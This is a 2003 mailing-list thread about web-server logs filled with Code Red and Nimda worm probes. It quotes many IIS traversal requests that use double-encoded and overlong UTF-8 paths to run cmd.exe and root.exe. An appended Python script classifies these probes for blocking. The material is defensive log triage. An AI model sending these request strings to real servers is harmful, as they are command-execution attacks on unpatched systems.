On Thursday 13 March 2003 01:57 pm, Jack Coates wrote:
> http://www.monkeynoodle.org/lrp/deworming.html
>
> On Sun, 2003-03-09 at 05:01, Gary Hodder wrote:
> > Hi all,
> > any way to stop getting overrun with this crud.
> > The start of each line has been removed to protect the guilty.
> >
> > Thanks
> > Gary.
> >
> > xxx.xxx.com [ip-of-host] - - [09/Mar/2003:15:10:58 +1100] "GET
> > /scripts/root.exe?/c+dir HTTP/1.0" 404 300
> > 1100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 298
> > 1100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308
> > v1100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308
> > 1100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404
> > 322
> > 1100]"GET/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/
> >c+dir HTTP/1.0" 404 339
> > 1100]"GET/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/
> >c+dir HTTP/1.0" 404 339
> > 1100]"GET/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1
> >c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 355
> > 1100] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
> > 404 321 1100] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir
> > HTTP/1.0" 404 321 1100] "GET
> > /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 321 1100]
> > "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 321
> > 1100] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
> > 400 305
> > 1100] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400
> > 305 1100] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir
> > HTTP/1.0" 404 322
> > 1100] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404
> > 322 1100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 300
> > 1100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 298
> > 1100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308
> > 1100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308
> > 1100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404
> > 322
> > 1100]"GET/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/
> >c+dir HTTP/1.0" 404 339
> > 1100]"GET/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/
> >c+dir HTTP/1.0" 404 339
> > 1100]"GET/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1
> >c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 355
> > 1100] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
> > 404 321 1100] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir
> > HTTP/1.0" 404 321 1100] "GET
> > /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 321 1100]
> > "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 321
> > 1100] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
> > 400 305
> > 1100] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400
> > 305 1100] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir
> > HTTP/1.0" 404 322
> > 1100] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404
> > 322 1100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 300
> > 1100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 298
> >
> >
> >
> > ______________________________________________________________________
> >
> > Want to buy your Pack or Services from MandrakeSoft?
> > Go to http://www.mandrakestore.com

Ummm, actually you are not protecting the guilty, but rather innocent victims of Code Red, Nimda and gross negligence in not updating their systems. Pierre Fortin has some dandy answers, concerned with automated email to sysadmins followed by action to keep them from bothering you or others. I think you will find them at his site.

http://pfortin.com/Linux/

Civileme
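
Triage of the request patterns in the quoted log, as an added example (not code from this thread or from the sites it links to): each request path is percent-decoded repeatedly so the double-encoded and overlong UTF-8 variants fall into named families, which are then tallied per source host for a report or a block rule. The function names, sample lines and documentation-range addresses are constructed for illustration.

```python
import re
from collections import Counter
from urllib.parse import unquote_to_bytes

# Common Log Format: host ident user [time] "METHOD path PROTO" status size
LOG = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')

def decode_fully(path, max_rounds=5):
    """Percent-decode until the bytes stop changing; return (bytes, rounds)."""
    data, rounds = path.encode("latin-1", "replace"), 0
    for _ in range(max_rounds):
        nxt = unquote_to_bytes(data)
        if nxt == data:
            break
        data, rounds = nxt, rounds + 1
    return data, rounds

def classify(path):
    """Name the probe family for a request path, or None if it is not one."""
    raw, rounds = decode_fully(path)
    low = raw.lower().replace(b"\\", b"/")
    if not re.search(rb"/(cmd|root)\.exe", low):
        return None
    if b"\xc0" in raw or b"\xc1" in raw:    # lead bytes never valid in UTF-8
        return "overlong-utf8-traversal"
    if rounds > 1:                          # e.g. %255c -> %5c -> backslash
        return "multi-encoded-traversal"
    return "traversal" if b"../" in low else "direct-probe"

def summarize(lines):
    """Tally probe families per source host."""
    hits = {}
    for line in lines:
        m = LOG.match(line)
        if m and (kind := classify(m.group(3))):
            hits.setdefault(m.group(1), Counter())[kind] += 1
    return hits

# Constructed sample lines, modelled on the request paths in the quoted log.
SAMPLE = [
    '192.0.2.10 - - [09/Mar/2003:15:10:58 +1100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 300',
    '192.0.2.10 - - [09/Mar/2003:15:10:59 +1100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 322',
    '192.0.2.10 - - [09/Mar/2003:15:11:00 +1100] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 321',
    '192.0.2.10 - - [09/Mar/2003:15:11:01 +1100] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 305',
    '198.51.100.7 - - [09/Mar/2003:15:12:30 +1100] "GET /index.html HTTP/1.0" 200 1043',
]

if __name__ == "__main__":
    for host, kinds in summarize(SAMPLE).items():
        print(host, dict(kinds))
```
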
